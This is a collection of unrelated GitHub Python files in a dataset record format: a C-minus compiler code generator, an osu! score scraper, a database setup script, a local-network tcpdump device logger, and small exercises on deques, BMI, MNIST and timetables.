self.cmp_save,\n 'jp_break': self.jp_break,\n 'jp_switch': self.jp_switch,\n 'jpf_switch': self.jpf_switch,\n 'function_call': self.function_call,\n 'var': self.var,\n 'arg': self.arg,\n 'fun_declaration': self.fun_declaration,\n 'fun_declaration_end': self.fun_declaration_end,\n 'param_var': self.param_var,\n 'param_arr': self.param_arr,\n 'fun_declarated': self.fun_declarated,\n 'arg_declaration': self.arg_declaration,\n 
'return_stmt': self.return_stmt,\n }\n self.arg_actions = ['pid', 'pnum', 'sign', 'relop_sign',\n 'fun_declaration', 'arg_declaration']\n self.symbol_table = {}\n self.temp_args = []\n self.function = None\n self.callers = []\n self.function_arg_number = 0\n self.temp_id = None\n self.calling_function = []\n\n def find_addr(self):\n t = self.cur_mem_addr\n self.cur_mem_addr += 4\n return t\n\n def get_temp(self):\n t = self.cur_temp\n self.cur_temp += 4\n return t\n\n def find_func_addr(self):\n t = self.func_memory_cur\n self.func_memory_cur += 4\n return t\n\n def generate(self, action_symbol, arg=None):\n print('==== action sym',action_symbol)\n if not self.main_access_link:\n t = self.get_temp()\n self.main_access_link = t\n print(f'{action_symbol[1:]}({arg})\\r\\t\\t\\t\\t\\t\\t\\t\\t-> {str(self.semantic_stack)[:-1]}')\n self.action_symbols[action_symbol[1:]](arg)\n\n def pid(self, args):\n print(args)\n tmp = 0\n if len(args) == 3:\n void_type = args[0]\n else:\n tmp = 1\n lexeme = args[1 - tmp]\n line_no = args[2 - tmp]\n self.temp_id = lexeme\n if lexeme in self.symbol_table and self.symbol_table[lexeme]['type'] == 'func':\n self.callers.append(self.function)\n self.calling_function.append(lexeme)\n return\n if self.fun_declarating:\n if lexeme == 'output':\n self.calling_function.append(lexeme)\n return\n for key, value in self.symbol_table[self.function][\"args\"]:\n if key == lexeme:\n self.semantic_stack.append(value['addr'])\n return\n for key, value in self.symbol_table[self.function][\"vars\"].items():\n if key == lexeme:\n self.semantic_stack.append(value['addr'])\n return\n for key, val in self.memory.items():\n if key == lexeme:\n self.semantic_stack.append(val)\n return\n if void_type:\n err_msg = f\"{line_no}: Semantic Error! Illegal type of void for {lexeme}.\"\n self.semantic_errors.append(err_msg)\n return\n t = self.find_func_addr()\n sym = {'addr': t, 'data_type': 'void' if void_type else 'int'}\n if self.arg_declarating:\n self.temp_args.append([lexeme, sym])\n else:\n if not 'vars' in self.symbol_table[self.function]:\n self.symbol_table[self.function]['vars'] = {}\n sym = {lexeme: sym}\n self.symbol_table[self.function]['vars'].update(sym)\n self.semantic_stack.append(t)\n else:\n for key, val in self.memory.items():\n if key == lexeme:\n self.semantic_stack.append(val)\n return\n if lexeme == 'output':\n self.calling_function.append(lexeme)\n return\n addr = self.find_addr()\n self.memory.update({lexeme: addr})\n sym = {'addr': addr, 'data_type': 'void' if void_type else 'int', 'args': {}, 'vars': {}}\n self.symbol_table.update({lexeme: sym})\n self.add_to_program_block(f'(ASSIGN, #0, {addr}, )')\n self.semantic_stack.append(addr)\n\n def var(self, args):\n void_type = args[0]\n lexeme = args[1]\n line_no = args[2]\n if void_type:\n err_msg = f\"{line_no}: Semantic Error! 
Illegal type of void for {lexeme}.\"\n self.semantic_errors.append(err_msg)\n del self.symbol_table[lexeme]\n return\n if self.function:\n self.symbol_table[self.function]['vars'][lexeme].update({'type': 'var'})\n else:\n self.symbol_table[lexeme].update({'type': 'var'})\n\n def pnum(self, arg):\n num_addr = self.get_temp()\n self.add_to_program_block(f'(ASSIGN, #{arg}, {num_addr}, )')\n self.temp.update({num_addr: arg})\n self.semantic_stack.append(num_addr)\n\n def array_address(self, arg=None):\n index = self.semantic_stack.pop()\n var_addr = self.semantic_stack.pop()\n t = self.get_temp()\n self.add_to_program_block(f'(MULT, {index}, #4, {t})')\n self.add_to_program_block(f'(ADD, #{var_addr}, {t}, {t})')\n self.semantic_stack.append('@' + str(t))\n # self.temp.update({t: var_addr + 4*int(self.temp[index])})\n\n def assign(self, arg=None):\n pprint(self.symbol_table)\n op2 = self.semantic_stack.pop()\n op1 = self.semantic_stack.pop()\n self.add_to_program_block(f'(ASSIGN, {op2}, {op1}, )')\n # t = self.get_temp()\n self.semantic_stack.append(op1)\n # self.temp[t] = op1\n\n def whil(self, arg=None):\n i = len(self.program_block)\n self.program_block[self.semantic_stack[-1]] = f'(JPF, {self.semantic_stack[-2]}, {i + 1}, )'\n self.add_to_program_block(f'(JP, {self.semantic_stack[-3] + 1}, , )')\n # self.add_to_program_block('')\n self.semantic_stack.pop()\n self.semantic_stack.pop()\n self.semantic_stack.pop()\n self.break_stack.pop()\n\n def add(self, arg=None):\n op1 = self.semantic_stack.pop()\n operation = self.semantic_stack.pop()\n op2 = self.semantic_stack.pop()\n t = self.get_temp()\n self.semantic_stack.append(t)\n if operation == '+':\n self.add_to_program_block(f'(ADD, {op1}, {op2}, {t})')\n else:\n self.add_to_program_block(f'(SUB, {op2}, {op1}, {t})')\n\n def mult(self, arg=None):\n op1 = self.semantic_stack.pop()\n op2 = self.semantic_stack.pop()\n t = self.get_temp()\n self.semantic_stack.append(t)\n self.add_to_program_block(f'(MULT, {op1}, {op2}, {t})')\n\n def save(self, arg=None):\n pb_ind = len(self.program_block)\n self.semantic_stack.append(pb_ind)\n self.add_to_program_block('')\n\n def jpf(self, arg=None):\n pb_ind = self.semantic_stack.pop()\n if_exp = self.semantic_stack.pop()\n i = len(self.program_block)\n print(self.program_block)\n\n self.program_block[pb_ind] = f'(JPF, {if_exp}, {i + 1},)'\n self.semantic_stack.append(i)\n self.add_to_program_block('')\n\n def jp(self, arg=None):\n pb_ind = self.semantic_stack.pop()\n i = len(self.program_block)\n self.program_block[pb_ind] = f'(JP, {i}, ,)'\n\n def label(self, arg=None):\n self.break_stack.append('while')\n pb_ind = len(self.program_block) - 1\n self.semantic_stack.append(pb_ind)\n\n def relop(self, arg=None):\n op_2 = self.semantic_stack.pop()\n operand = self.semantic_stack.pop()\n op_1 = self.semantic_stack.pop()\n t = self.get_temp()\n self.semantic_stack.append(t)\n if operand == '==':\n self.add_to_program_block(f'(EQ, {op_1}, {op_2}, {t})')\n elif operand == '<':\n self.add_to_program_block(f'(LT, {op_1}, {op_2}, {t})')\n\n def relop_sign(self, arg):\n self.semantic_stack.append(arg)\n\n def sign(self, arg):\n self.semantic_stack.append(arg)\n\n def signed_num(self, arg=None):\n n = self.semantic_stack.pop()\n sign = self.semantic_stack.pop()\n if self.temp.__contains__(n):\n number = int(self.temp[n])\n if sign == '-':\n self.pnum(-number)\n else:\n self.pnum(number)\n else:\n if self.fun_declarating:\n for key, value in self.symbol_table[self.function][\"args\"]:\n if value['addr'] == n:\n number = 
value['addr']\n t = self.get_temp()\n self.semantic_stack.append(t)\n if sign == '-':\n self.add_to_program_block(f'(MULT, {number}, #-1, {t})')\n else:\n self.add_to_program_block(f'(MULT, {number}, #1, {t})')\n return\n for key, value in self.symbol_table[self.function][\"vars\"].items():\n if value['addr'] == n:\n number = value['addr']\n t = self.get_temp()\n self.semantic_stack.append(t)\n if sign == '-':\n self.add_to_program_block(f'(MULT, {number}, #-1, {t})')\n else:\n self.add_to_program_block(f'(MULT, {number}, #1, {t})')\n return\n for key, val in self.memory.items():\n if value['addr'] == n:\n number = value['addr']\n t = self.get_temp()\n self.semantic_stack.append(t)\n if sign == '-':\n self.add_to_program_block(f'(MULT, {number}, #-1, {t})')\n else:\n self.add_to_program_block(f'(MULT, {number}, #1, {t})')\n return\n else:\n for key, val in self.memory.items():\n if val == n:\n number = val\n t = self.get_temp()\n self.semantic_stack.append(t)\n if sign == '-':\n self.add_to_program_block(f'(MULT, {number}, #-1, {t})')\n else:\n self.add_to_program_block(f'(MULT, {number}, #1, {t})')\n\n\n def save_program_block(self):\n with open('output.txt', 'w') as output:\n for i, block in enumerate(self.program_block):\n output.write(f'{i}\\t{block}\\n')\n\n def pop(self, arg=None):\n self.semantic_stack.pop()\n\n def output(self, arg=None):\n to_print = self.semantic_stack.pop()\n self.semantic_stack.append(None)\n self.add_to_program_block(f'(PRINT, {to_print}, , )')\n\n\n def save_arr(self, args):\n void_type = args[0]\n lexeme = args[1]\n size = args[2]\n line_no = args[3]\n index = self.semantic_stack.pop()\n if len(self.calling_function) > 0:\n self.symbol_table[self.function]['vars'][lexeme].update({'type': 'arr'})\n for i in range(1, int(self.temp[index])):\n self.add_to_program_block(f'(ASSIGN, #0, {self.func_memory_cur}, )')\n self.func_memory_cur += 4\n else:\n self.symbol_table[lexeme].update({'type': 'arr'})\n for i in range(1, int(self.temp[index])):\n self.add_to_program_block(f'(ASSIGN, #0, {self.cur_mem_addr}, )')\n self.cur_mem_addr += 4\n if void_type:\n err_msg = f\"{line_no}: Semantic Error! Illegal type of void for {lexeme}.\"\n self.semantic_errors.append(err_msg)\n del self.symbol_table[lexeme]\n return\n\n\n def tmp_save(self, arg=None):\n self.break_stack.append('switch')\n print('break stacke now', self.break_stack)\n i = len(self.program_block)\n self.add_to_program_block(f'(JP, {i + 2}, ,)')\n self.add_to_program_block('')\n self.semantic_stack.append(i + 1)\n\n def cmp_save(self, arg=None):\n t = self.get_temp()\n op1 = self.semantic_stack.pop()\n op2 = self.semantic_stack[-1]\n self.add_to_program_block(f'(EQ, {op1}, {op2}, {t})')\n self.semantic_stack.append(t)\n self.add_to_program_block('')\n i = len(self.program_block)\n self.semantic_stack.append(i - 1)\n\n def jp_break(self, line_no):\n print('now we are in break ~~~~~~~~', self.break_stack)\n if len(self.break_stack) == 0:\n err_msg = f\"{line_no}: Semantic Error! 
No 'while' or 'switch' found for 'break'\"\n self.semantic_errors.append(err_msg)\n break_top = self.break_stack[-1]\n if break_top == 'switch':\n self.add_to_program_block(f'(JP, {self.semantic_stack[-4]}, ,)')\n else: #todo here for break in while loops\n self.add_to_program_block(f'(JP, {self.semantic_stack[-2]}, ,)')\n\n def jpf_switch(self, arg=None):\n ind = self.semantic_stack[-1]\n i = len(self.program_block)\n self.program_block[ind] = f'(JPF, {self.semantic_stack[-2]}, {i} ,)'\n self.semantic_stack.pop()\n self.semantic_stack.pop()\n\n def jp_switch(self, arg=None):\n i = len(self.program_block)\n ind = self.semantic_stack[-2]\n self.program_block[ind] = f'(JP, {i}, ,)'\n self.semantic_stack.pop()\n self.semantic_stack.pop()\n self.break_stack.pop()\n\n def function_call(self, arg):\n print('~~~~~~',self.calling_function)\n if self.calling_function[-1] == 'output':\n self.output()\n return\n address = self.symbol_table[self.calling_function[-1]]['addr']\n return_address = self.symbol_table[self.calling_function[-1]]['return_address']\n self.add_to_program_block(f'(ASSIGN, #{len(self.program_block) + 2}, {return_address}, )')\n self.add_to_program_block(f'(JP, {address}, , )')\n if self.function_arg_number != len(self.symbol_table[self.calling_function[-1]]['args']):\n err_msg = f\"{arg}: semantic error! Mismatch in numbers of arguments of {self.calling_function[-1]}\"\n self.semantic_errors.append(err_msg)\n return\n if self.symbol_table[self.calling_function[-1]]['data_type'] == 'void':\n self.semantic_stack.append(None)\n else:\n return_value = self.symbol_table[self.calling_function[-1]]['return_value']\n self.semantic_stack.append(return_value)\n self.function_arg_number = 0\n self.calling_function.pop()\n self.function = self.callers.pop()\n\n\n def arg(self, arg=None):\n if not self.function or ((not self.callers or self.callers[-1] != 'main') and self.fun_declarating):\n return\n st = self.symbol_table[self.calling_function[-1]]\n if len(st[\"args\"]) == self.function_arg_number:\n err_msg = f\"{arg}: semantic error! 
Mismatch in numbers of arguments of {self.calling_function[-1]}\"\n self.semantic_errors.append(err_msg)\n return\n value_address = self.semantic_stack.pop()\n address = st['args'][self.function_arg_number][1]['addr']\n self.add_to_program_block(f'(ASSIGN, {value_address}, {address}, )')\n self.function_arg_number += 1\n\n def arg_declaration(self, arg):\n lexeme = arg\n self.arg_declarating = True\n self.fun_declarating = True\n self.function = self.temp_id\n if self.function != 'main':\n self.semantic_stack.append(len(self.program_block))\n self.program_block.append(None)\n t = self.find_func_addr()\n self.symbol_table[self.function].update({'return_value': t})\n t = self.find_func_addr()\n self.symbol_table[self.function].update({'return_address': t})\n\n def fun_declaration(self, arg):\n lexeme = arg\n if not self.function:\n return\n self.symbol_table[lexeme].update({'type': 'func'})\n\n def fun_declaration_end(self, arg=None):\n if not self.function:\n return\n self.fun_declarating = False\n address = self.symbol_table[self.function]['return_address']\n self.add_to_program_block(f'(JP, @{address}, , )')\n if self.function != 'main':\n st = self.semantic_stack.pop()\n self.program_block[st] = f'(JP, {len(self.program_block)}, , )'\n self.symbol_table[self.function].update({'type': 'func'})\n self.function = None\n\n def param_arr(self, arg=None):\n self.temp_args[-1][-1].update({'type': 'arr'})\n if self.arg_declarating:\n self.semantic_stack.pop()\n\n def param_var(self, arg=None):\n self.temp_args[-1][-1].update({'type': 'var'})\n if self.arg_declarating:\n self.semantic_stack.pop()\n\n def fun_declarated(self, args):\n if not self.function:\n return\n self.symbol_table[self.function].update({'args': self.temp_args, 'addr': len(self.program_block)})\n self.arg_declarating = False\n self.temp_args = []\n\n def return_stmt(self, arg=None):\n if self.symbol_table[self.function]['data_type'] == 'void':\n return_address = self.symbol_table[self.function]['return_address']\n self.add_to_program_block(f'(JP, @{return_address}, , )')\n return\n t = self.symbol_table[self.function]['return_value']\n l = self.semantic_stack.pop()\n self.add_to_program_block(f'(ASSIGN, {l}, {t}, )')\n return_address = self.symbol_table[self.function]['return_address']\n self.add_to_program_block(f'(JP, @{return_address}, , )')\n\n\n\n def add_to_program_block(self, str):\n print('------------------->>', str, 'added.')\n self.program_block.append(str)\n\n# arg type check\n\n\n# temp_args = [\n# [arg, {'addr': 2, 'data_type': 'void/int', 'type': 'var/arr'}],\n# [arg, {'addr': 2, 'data_type': 'void/int', 'type': 'var/arr'}],\n# ]\n\n# test 1: 1 func done\n# test 2: 1 func done\n# test 3: switch, 1 func done\n# test 4: while break, inner func\n# test 5: array argument, 1 func\n# test 6: 1 func done\n# test 7: switch, 1 func done\n# test 8: 1 func, global arr used in func done\n# test 9: inner func, array argument\n# test 10: while break, inner func\n","repo_name":"maghasemzadeh/C-minus-compiler","sub_path":"codegen.py","file_name":"codegen.py","file_ext":"py","file_size_in_byte":19617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"75091107331","text":"# ライブラリのインポート\n#import re #正規表現\n#import sys\n#import heapq\nimport collections\n\n\ndef main():\n n, q = map(int, input().split())\n deq = collections.deque()\n for i in range(n):\n name, time = input().split()\n deq.append((int(time),name))\n ans = []\n elps = 0\n while deq:\n time, name = 
deq.popleft()\n if time <= q:\n elps += time\n ans.append((name, elps))\n else:\n elps += q\n deq.append((time-q, name))\n [print(*i) for i in ans]\n \n\n\n \nif __name__ == '__main__':\n main()\n","repo_name":"kmatsura/jouhousuurikagakuensyuu2","sub_path":"dai4kai/deque.py","file_name":"deque.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72170317574","text":"import datetime\nimport logging\nimport os\nimport time\n\nimport pymongo\nimport requests\nimport schedule\nfrom pymongo.collection import Collection\n\nlogger = logging.getLogger('user_update')\nlogger.setLevel(os.getenv('LOG_LEVEL', 'INFO').upper())\nloggers_formatter = logging.Formatter(\n '%(asctime)s | %(levelname)s | %(process)d | %(name)s | %(funcName)s | %(message)s',\n datefmt='%d/%m/%Y %I:%M:%S')\n\nch = logging.StreamHandler()\nch.setFormatter(loggers_formatter)\nlogger.addHandler(ch)\nlogger.propagate = False\n\n\nclass OsuApi:\n def __init__(self, client_id, client_secret):\n self._client_id = client_id\n self._client_secret = client_secret\n\n self._base_url = 'https://osu.ppy.sh/api/v2/'\n self._last_request_time = datetime.datetime.now() - datetime.timedelta(hours=1000)\n self._cooldown = datetime.timedelta(seconds=1)\n\n self._auth_header = self._authorize()\n\n def _authorize(self) -> dict:\n data = {'client_id': self._client_id,\n 'client_secret': self._client_secret,\n 'grant_type': 'client_credentials',\n 'scope': 'public'}\n\n with requests.post('https://osu.ppy.sh/oauth/token', json=data) as r:\n response = r.json()\n\n access_token = response['access_token']\n\n return {'Authorization': f'Bearer {access_token}'}\n\n def get_top_std_players(self, page=1):\n params = {'page': page}\n response = self._get_endpoint('rankings/osu/performance', params)\n return response['ranking']\n\n def get_top_scores_of_player(self, user_id):\n params = {'mode': 'osu',\n 'limit': 50}\n top_scores = []\n top_scores.extend(self._get_endpoint(f'users/{user_id}/scores/best', params))\n params = {'mode': 'osu',\n 'limit': 50,\n 'offset': 50}\n top_scores.extend(self._get_endpoint(f'users/{user_id}/scores/best', params))\n return top_scores\n\n def _get_endpoint(self, endpoint, params=None):\n time_now = datetime.datetime.now()\n if time_now < self._last_request_time + self._cooldown:\n wait_for = (self._last_request_time + self._cooldown - time_now).total_seconds()\n time.sleep(wait_for)\n\n with requests.get(self._base_url + endpoint, params=params, headers=self._auth_header) as r:\n response = r.json()\n\n self._last_request_time = time_now\n return response\n\n\ndef insert_scores_routine(osu_api: OsuApi, scores_collection: Collection):\n logger.info(f'Started insert_scores_routine()!')\n for page_num in range(1, 21):\n top_players = osu_api.get_top_std_players(page=page_num)\n logger.info(f'Looking at page {page_num} of performance rankings.')\n\n for player_details in top_players:\n player_user_id = player_details['user']['id']\n player_scores = osu_api.get_top_scores_of_player(player_user_id)\n\n db_scores = []\n for score in player_scores:\n score['_id'] = score['id']\n if scores_collection.find_one({'_id': score['id']}):\n continue\n db_scores.append(score)\n if len(db_scores) != 0:\n logger.info(f'Inserting scores for {player_details[\"user\"][\"username\"]}')\n scores_collection.insert_many(db_scores)\n else:\n logger.info(f'Skipping scores of {player_details[\"user\"][\"username\"]}...')\n\n\ndef initialize_db():\n 
client = pymongo.mongo_client.MongoClient(os.getenv(\"MONGO_URL\"))\n scores_collection: Collection = client.TopOneK.Scores\n scores_collection.create_index([(\"pp\", pymongo.DESCENDING)])\n scores_collection.create_index([(\"pp\", pymongo.ASCENDING)])\n scores_collection.create_index([(\"score\", pymongo.DESCENDING)])\n scores_collection.create_index([(\"score\", pymongo.ASCENDING)])\n scores_collection.create_index([(\"mods\", pymongo.ASCENDING)])\n scores_collection.create_index([(\"mods\", pymongo.DESCENDING)])\n scores_collection.create_index([(\"beatmap.$**\", 1)])\n scores_collection.create_index([(\"beatmapset.$**\", 1)])\n scores_collection.create_index([(\"user.$**\", 1)])\n return scores_collection\n\n\nif __name__ == '__main__':\n\n api = OsuApi(client_id=os.getenv(\"OSU_CLIENT_ID\"), client_secret=os.getenv(\"OSU_CLIENT_SECRET\"))\n collection = initialize_db()\n\n insert_scores_routine(api, collection)\n schedule.every().day.at(\"12:00\").do(insert_scores_routine, api, collection)\n while True:\n schedule.run_pending()\n logger.info(f'Waiting...')\n time.sleep(600)\n","repo_name":"aticie/osu-top-scores-update","sub_path":"update_scores.py","file_name":"update_scores.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1930821166","text":"# pip install mysql-connector-python\nimport mysql.connector\nimport os\nimport shutil\nimport sys\n\nroot = \".\"\n\n\ndef init_db():\n sql_file = os.path.join(root + \"/setup/app.sql\")\n\n if os.path.isfile(sql_file):\n if os.path.isfile(\"../app/src/System/db.php\") and input(\"Fetch credentials from local db.php? (y/n) \") == \"y\":\n print(\"Reading credentials from existing db.php...\")\n auth = {}\n with open(\"../app/src/System/db.php\", \"r\", encoding=\"utf-8\") as file:\n for line in file:\n if \"$_ENV\" in line:\n key, value = line[7:13], line[19:-3]\n if key == \"dbchar\":\n continue\n auth[key] = value\n print(key + \" => \" + value)\n print(\"Finished reading db.php.\")\n else:\n auth = {\n \"dbhost\": \"localhost\",\n \"dbname\": input(\"Database: \"),\n \"dbuser\": input(\"Username: \"),\n \"dbpass\": input(\"Password: \")\n }\n\n try:\n print(\"Connecting to database...\")\n connection = mysql.connector.connect(\n user=auth[\"dbuser\"],\n password=auth[\"dbpass\"],\n host=auth[\"dbhost\"],\n database=auth[\"dbname\"])\n if connection.is_connected():\n print(\"Connected to database '%s'!\" % auth[\"dbname\"])\n cursor = connection.cursor()\n\n rewrite_file(\"db.php\", auth, \"$_ENV\", \"dbchar\", \"utf-8\")\n\n if input(\"Drop database tables (if they exist)? (y/n) \") == \"y\":\n print(\"Dropping database tables...\")\n cursor.execute(\"DROP TABLE IF EXISTS `post_comments`, `posts`, `post_categories`;\")\n cursor.execute(\"DROP TABLE IF EXISTS `users`, `user_ranks`;\")\n print(\"Database tables dropped.\")\n else:\n print(\"Not dropping existing tables (if any).\")\n\n if input(\"Create database tables? 
(y/n) \") == \"y\":\n print(\"Creating database tables...\")\n parse_sql(sql_file, cursor, \";\", \"utf-8\")\n else:\n print(\"Database initialization skipped.\")\n\n except mysql.connector.Error as e:\n if \"Query was empty\" not in str(e):\n print(\"Database connection error: \", e)\n else:\n print(\"Finished parsing %s.\" % sql_file)\n\n finally:\n if \"connection\" in locals():\n if connection.is_connected():\n print(\"Closing database connection...\")\n cursor.close()\n connection.close()\n print(\"Connection closed.\")\n\n else:\n print(\"Error: \" + root + \"/setup/app.sql not found.\")\n\n\ndef init_files():\n files = {\n \"db.php\": \"../app/src/System/\",\n \"salt.php\": \"../app/src/System/\"\n }\n\n for filename, subdir in files.items():\n sub_dirs = subdir.split(\"/\")\n make_dir = sub_dirs[0] + \"/\"\n for dir_name in sub_dirs[1:]:\n make_dir += dir_name + \"/\"\n if not os.path.exists(os.path.join(root, make_dir)):\n os.mkdir(os.path.join(root, make_dir))\n\n target = os.path.join(root, subdir, filename)\n if not os.path.isfile(target):\n print(\"Couldn't find \" + filename + \". Creating...\")\n src = os.path.join(root + \"/setup/\" + filename[:-3] + \"default.php\")\n if os.path.isfile(src):\n shutil.copyfile(src, target)\n print(\"Success.\")\n else:\n print(\"Error: \" + root + \"/setup/\" + filename[:-3] + \"default.php not found.\")\n else:\n print(filename + \" already exists. Skipping...\")\n\n\ndef parse_sql(filename, cursor, delimiter, charset):\n file = open(filename, \"r\", encoding=charset)\n contents = file.read()\n file.close()\n queries = contents.split(delimiter)\n for query in queries:\n cursor.execute(query)\n\n\ndef rewrite_file(filename, data, array, skip, charset):\n if input(\"Save credentials to %s? (y/n) \" % filename) == \"y\":\n print(\"Writing credentials to %s.\" % filename)\n target_file = open(root + \"/../app/src/System/%s\" % filename, \"w\", encoding=charset)\n with open(root + \"/setup/%sdefault.php\" % filename[:-3], \"r\", encoding=charset) as source_file:\n for line in source_file:\n if array not in line or skip in line:\n target_file.write(line)\n else:\n for key, value in data.items():\n if key in line:\n target_file.write(array + \"['\" + key + \"'] = '\" + value + \"';\\n\")\n target_file.close()\n print(\"Finished writing to %s.\" % filename)\n else:\n print(\"Skipped writing to %s.\" % filename)\n\n\ndef main():\n if input(\"Create default files? (y/n) \") == \"y\":\n init_files()\n else:\n print(\"Default file creation skipped.\")\n\n if input(\"Establish MySQL connection? (y/n) \") == \"y\":\n init_db()\n else:\n print(\"MySQL connection skipped.\")\n\n print(\"All operations completed. 
Exiting...\")\n sys.exit()\n\n\nmain()\n","repo_name":"gregor-dietrich/skeletor","sub_path":"scripts/setup_full.py","file_name":"setup_full.py","file_ext":"py","file_size_in_byte":5340,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"72358635973","text":"print(\"\"\"\n*********************************************\n\nBeden Kitle Endeksi Hesaplama\n\n*********************************************\n\"\"\")\n\nboy = float(input(\"Boyunuzu giriniz: \"))\nkilo = float(input(\"Kilonuzu giriniz: \"))\nbki = kilo / (boy ** 2)\nprint(\"Beden kitle endeksiniz: \", bki)\n\nif bki < 18.25:\n print(\"Zayıf\")\nelif 18.5 < bki < 25:\n print(\"Normal\")\nelif 25 < bki < 30:\n print(\"Fazla Kilolu\")\nelif bki > 30:\n print(\"Obez\")\nelse:\n print(\"Geçersiz boy ve kilo değerleri!\")","repo_name":"esenboga/pythonFirstProject","sub_path":"BedenKitleEndeksi2.py","file_name":"BedenKitleEndeksi2.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"9579306148","text":"# 导入input_data这个类\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport tensorflow as tf\n\n# 从这个类里调用read_data_sets这个方法\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n\nx = tf.placeholder(tf.float32, [None, 784])\n\nW = tf.Variable(tf.zeros([784, 10]))\nb = tf.Variable(tf.zeros([10]))\n\ny = tf.nn.softmax(tf.matmul(x, W) + b)\n\ny_ = tf.placeholder(tf.float32, [None, 10])\n\nsess = tf.InteractiveSession()\n\n# // 初始化所有变量\ntf.global_variables_initializer().run()\n\nsaver = tf.train.Saver(max_to_keep=1)\n\nmodel_file = tf.train.latest_checkpoint('ckpt/')\nsaver.restore(sess, model_file)\n\ncorrect_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\n\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\nprint(sess.run(accuracy, feed_dict={x: mnist.test.images, y_: mnist.test.labels}))\n","repo_name":"1050035126/TestTensorFlow","sub_path":"BaseTest/test6_check.py","file_name":"test6_check.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16290786382","text":"import datetime\nimport json\nimport netaddr\nimport re\nimport subprocess\nimport signal\n\ncmd = ['sudo', '-n', 'tcpdump', '-e', '-n', '--immediate-mode', '-l']\n# cmd = ['/bin/sh', '-c', 'cat sniff2.log']\n\nprint(f'Running: {cmd}')\n\ndef render_timestamp(time):\n return {\n 'timestamp_epoch': time.timestamp(),\n 'timestamp_human': str(time),\n }\n\ndef write_log(mac_to_info, time):\n with open('sniffed.json', 'w') as f:\n data = {\n 'mac_addresses' : mac_to_info\n }\n data.update(render_timestamp(time))\n print(f'{data[\"timestamp_human\"]}: Writing log with {len(mac_to_info)} mac address entries.')\n json.dump(data, f, indent=2)\n\nHEX_DIGIT_PAIR=r'[0-9a-f]{2}'\nMAC_ADDRESS_REGEX = r':'.join([r'[0-9a-f]{2}']*6)\nIP_ADDRESS_REGEX = r'\\.'.join([r'[0-9]{1,3}']*4)\nPORT_OPTIONAL_REGEX = r'(?:\\.[0-9]{1,5})?'\nTIMESTAMP_REGEX = r'[0-9]{2}:[0-9]{2}:[0-9]{2}.[0-9]{6}'\nLINE_REGEX=r'^'+TIMESTAMP_REGEX+r' (?P'+MAC_ADDRESS_REGEX+r') > (?P'+MAC_ADDRESS_REGEX+r'), (?:ethertype (?P[A-Za-z0-9]{2,6}))?.*?, length [0-9]{1,}: .*?(?P'+IP_ADDRESS_REGEX+r')'+PORT_OPTIONAL_REGEX+r' (?P[^ ]+) (?P'+IP_ADDRESS_REGEX+r')'+PORT_OPTIONAL_REGEX\n\noutput_received = False\nmac_to_info = {}\n\nlast_log_write = datetime.datetime.now()\nwrite_log(mac_to_info, last_log_write)\n\nwith subprocess.Popen(\n 
cmd,\n stderr=subprocess.DEVNULL,\n stdout=subprocess.PIPE\n ) as proc:\n\n while True:\n line = proc.stdout.readline()\n if not line:\n print('Polling to see if complete?')\n \n if proc.poll() == None:\n continue\n else:\n break\n\n if not output_received:\n output_received = True\n print(f'First output received from {cmd}')\n\n time_now = datetime.datetime.now()\n\n line = line.decode('utf-8')\n # print(line)\n match = re.match(LINE_REGEX, line)\n if match:\n params = match.groupdict()\n # print(params)\n for mac, ip in [\n (params['mac_from'], params['ip_to'] if params['operator'] == 'tell' else params['ip_from']),\n (params['mac_to'], params['ip_from'] if params['operator'] == 'tell' else params['ip_to'])\n ]:\n if ip.startswith('192.168.0.') and mac != 'ff:ff:ff:ff:ff:ff':\n if mac not in mac_to_info:\n try:\n organization = netaddr.EUI(mac).oui.registration().org\n except:\n organization = 'Unknown'\n \n mac_to_info[mac] = {\n 'ip_address': ip,\n 'mac_address': mac,\n 'organization': organization\n }\n mac_to_info[mac].update(render_timestamp(time_now))\n # print(line)\n # print(params)\n print(f'Sniffed {mac_to_info[mac]}')\n last_log_write = time_now\n write_log(mac_to_info, last_log_write)\n else:\n mac_to_info[mac].update(render_timestamp(time_now))\n else:\n if ' IPv6 ' not in line and line != '' and ' is-at ' not in line:\n # print(f'No match for: {line}')\n pass\n\n if time_now.timestamp() - last_log_write.timestamp() > 30:\n last_log_write = time_now\n write_log(mac_to_info, last_log_write)\n\n # NOTE: requires entry in /etc/sudoers:\n # = (root) NOPASSWD: /usr/sbin/tcpdump\n\n print(f'Complete: {cmd} with status code {proc.returncode}') \n\n # TODO: What's the returncode when it sudoers is not setup to allow it?\n\n\n\n \n \n","repo_name":"curious-attempt-bunny/network-sniffer","sub_path":"sniffer.py","file_name":"sniffer.py","file_ext":"py","file_size_in_byte":3945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"43801744475","text":"def optimal_time_table(timetable: list) -> list:\n \"\"\"\n :param timetable: [(9.0, 10.0), (9.3, 10.3), (10.0, 11.0), (10.3, 11.3)]\n :return: [(9.0, 10.0), (10.0, 11.0)]\n schedule with the largest number of lessons.\n \"\"\"\n\n timetable.sort(key=lambda x: (x[1], x[0]))\n new_timetable = []\n i = 0\n\n while i < len(timetable):\n if i == 0:\n new_timetable.append(timetable[i])\n i += 1\n continue\n\n if new_timetable[-1][1] <= timetable[i][0]:\n new_timetable.append(timetable[i])\n i += 1\n\n return 